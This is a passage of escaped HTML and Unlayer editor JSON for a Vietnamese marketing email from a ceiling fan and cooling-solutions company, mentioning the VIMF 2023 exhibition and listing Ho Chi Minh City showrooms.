m\\u1eabu qu\\u1ea1t tr\\u1ea7n \\u0111\\u01b0\\u1ee3c x\\u1ebfp h\\u1ea1ng ENERGY STAR\\u00ae c\\u1ee7a ch\\u00fang t\\u00f4i \\u0111\\u1ec3 \\u0111\\u00e1p \\u1ee9ng nhu c\\u1ea7u ng\\u00e0y c\\u00e0ng t\\u0103ng \\u0111\\u1ed1i v\\u1edbi c\\u00e1c d\\u1ef1 \\u00e1n b\\u1ec1n v\\u1eefng, \\u0111\\u01b0\\u1ee3c ch\\u1ee9ng nh\\u1eadn LEED.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #ecf0f1\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #ecf0f1;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:20px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 0px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677296625467-quet_BR_code_2023.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\" class=\\\"v-src-width v-src-max-width\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #bfd8d2\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #bfd8d2;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:40px 10px 10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<div align=\\\"center\\\">\\r\\n  <div style=\\\"display: table; max-width:187px;\\\">\\r\\n  <!--[if (mso)|(IE)]><table width=\\\"187\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"border-collapse:collapse;\\\" align=\\\"center\\\"><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"border-collapse:collapse; mso-table-lspace: 0pt;mso-table-rspace: 0pt; width:187px;\\\"><tr><![endif]-->\\r\\n  \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 15px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 15px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/linkedin.com\\/\\\" title=\\\"LinkedIn\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-black\\/linkedin.png\\\" alt=\\\"LinkedIn\\\" title=\\\"LinkedIn\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 15px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 15px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/twitter.com\\/\\\" title=\\\"Twitter\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-black\\/twitter.png\\\" alt=\\\"Twitter\\\" title=\\\"Twitter\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 15px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 15px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/instagram.com\\/\\\" title=\\\"Instagram\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-black\\/instagram.png\\\" alt=\\\"Instagram\\\" title=\\\"Instagram\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 0px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/youtube.com\\/\\\" title=\\\"YouTube\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-black\\/youtube.png\\\" alt=\\\"YouTube\\\" title=\\\"YouTube\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 20px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"font-size: 14px; color: #333333; line-height: 180%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 180%;\\\"><span style=\\\"font-size: 12px; line-height: 21.6px;\\\"><strong><span style=\\\"line-height: 21.6px;\\\">GI\\u1ea2I PH\\u00c1P L\\u00c0M M\\u00c1T TO\\u00c0N DI\\u1ec6N KH\\u00d4NG GIAN NH\\u00c0 \\u1ede - V\\u0102N PH\\u00d2NG - NH\\u00c0 X\\u01af\\u1edeNG C\\u00d4NG NGHI\\u1ec6P<\\/span><\\/strong><\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 180%;\\\"><span style=\\\"font-size: 12px; line-height: 21.6px;\\\"><strong>SR THU DUC: <\\/strong>184 Tran Luu, An Phu, Thu Duc, HCM<\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 180%;\\\"><span style=\\\"font-size: 12px; line-height: 21.6px;\\\"><strong>SR QU\\u1eacN 7: <\\/strong>812 Happy Valley, Nguyen Van Linh, Tan Phong, District 7, HCM<\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 180%;\\\"><span style=\\\"font-size: 12px; line-height: 21.6px;\\\">WIT.\\u00a0 All rights reserved. <\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 180%;\\\"><span style=\\\"font-size: 12px; line-height: 21.6px;\\\">Tax: 0315778682<\\/span><br \\/><span style=\\\"font-size: 12px; line-height: 21.6px;\\\"><a rel=\\\"noopener\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/lien-he\\\" target=\\\"_blank\\\"><span style=\\\"text-decoration: underline; font-size: 12px; line-height: 21.6px;\\\">Manage Preferences<\\/span> <\\/a>| <a rel=\\\"noopener\\\" href=\\\"https:\\/\\/haiku.hogiaphat.vn\\\" target=\\\"_blank\\\"><span style=\\\"text-decoration: underline; font-size: 12px; line-height: 21.6px;\\\">View in browser<\\/span>\\u00a0<\\/a><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n    <!--[if (mso)|(IE)]><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n  <\\/tbody>\\r\\n  <\\/table>\\r\\n  <!--[if mso]><\\/div><![endif]-->\\r\\n  <!--[if IE]><\\/div><![endif]-->\\r\\n<\\/body>\\r\\n\\r\\n<\\/html>\\r\\n\"', '\"{\\\"counters\\\":{\\\"u_row\\\":15,\\\"u_column\\\":20,\\\"u_content_text\\\":17,\\\"u_content_image\\\":12,\\\"u_content_video\\\":2,\\\"u_content_button\\\":8,\\\"u_content_social\\\":1,\\\"u_content_divider\\\":5},\\\"body\\\":{\\\"id\\\":\\\"ZKEsIo9cyJ\\\",\\\"rows\\\":[{\\\"id\\\":\\\"8v6X8_eWie\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"49F_V6CJYl\\\",\\\"contents\\\":[{\\\"id\\\":\\\"Zre8H6uUHc\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"30px 10px 15px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1688181449479-logo.png\\\",\\\"width\\\":2099,\\\"height\\\":1040,\\\"maxWidth\\\":\\\"94%\\\",\\\"autoWidth\\\":false},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_1\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"_override\\\":{\\\"mobile\\\":{\\\"src\\\":{\\\"maxWidth\\\":\\\"90%\\\",\\\"autoWidth\\\":false}}}}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_1\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#000000\\\",\\\"columnsBackgroundColor\\\":\\\"#000000\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_1\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"RKHaA3kNjd\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"sYJ1ipCk6A\\\",\\\"contents\\\":[{\\\"id\\\":\\\"wb89yjmG82\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"80px 10px 15px 30px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Global Font\\\",\\\"value\\\":\\\"inherit\\\"},\\\"fontWeight\\\":400,\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#ecf0f1\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_1\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-family: inherit; line-height: 19.6px;\\\\\\\"><span style=\\\\\\\"font-size: 44px; line-height: 61.6px;\\\\\\\"><strong>VIMF 2023<\\/strong><\\/span><\\/span><\\/p>\\\\n<p class=\\\\\\\"p1\\\\\\\" style=\\\\\\\"line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 10px; line-height: 14px;\\\\\\\">Tri\\u1ec3n L\\u00e3m Qu\\u1ed1c T\\u1ebf Chuy\\u00ean Ngh\\u00e0nh V\\u1ec1 M\\u00e1y M\\u00f3c Thi\\u1ebft B\\u1ecb, Dung C\\u1ee5 V\\u1eadt Li\\u1ec7u, C\\u00f4ng Ngh\\u1ec7 K\\u1ef9 Thu\\u1eadt \\u1ee8ng D\\u1ee5ng Cho Ngh\\u00e0nh C\\u00f4ng Nghi\\u1ec7p S\\u1ea3n Xu\\u1ea5t.<\\/span><\\/p>\\\\n<p class=\\\\\\\"p1\\\\\\\" style=\\\\\\\"line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 10px; line-height: 14px;\\\\\\\"><span class=\\\\\\\"s1\\\\\\\" style=\\\\\\\"line-height: 19.6px;\\\\\\\">\\u25b9\\u25b9\\u25b9<\\/span>Tổ chức đào tạo WIT\\/H\\u1ed3 Gia Ph\\u00e1t <span class=\\\\\\\"s1\\\\\\\" style=\\\\\\\"line-height: 19.6px;\\\\\\\">\\u25b9\\u25b9\\u25b9 -\\u00a0<\\/span><\\/span><\\/p>\\\\n<p class=\\\\\\\"p1\\\\\\\" style=\\\\\\\"line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 10px; line-height: 14px;\\\\\\\">MANG \\u0110\\u1ebeN GI\\u1ea2I PH\\u00c1P QU\\u1ea0T L\\u00c0M M\\u00c1T TI\\u1ec6N NGHI V\\u00c0 TR\\u1ea2I NGHI\\u1ec6M T\\u1ed0T H\\u01a0N CHO GIA \\u0110\\u00ccNH HO\\u1eb6C DOANH NGHI\\u1ec6P<\\/span><\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true},{\\\"id\\\":\\\"HAK8YEjON2\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"20px 30px 80px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#c97a14\\\",\\\"backgroundColor\\\":\\\"#ffffff\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_1\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<strong><span style=\\\\\\\"line-height: 16.8px;\\\\\\\">Xem th\\u00eam<br \\/><\\/span><\\/strong>\\\",\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":96,\\\"calculatedHeight\\\":37},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_2\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#040505\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1688179232621-1-banner.jpg\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"width\\\":600,\\\"height\\\":430,\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_2\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"gP8etI3XjW\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"IifB1_wM-O\\\",\\\"contents\\\":[{\\\"id\\\":\\\"GiDRLzAilF\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"0px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"20px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_4\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_18\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#e67e23\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_14\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"unikoM7yiA\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"h6wnCojqjn\\\",\\\"contents\\\":[{\\\"id\\\":\\\"Ma_hPqaB5Q\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 40px 0px 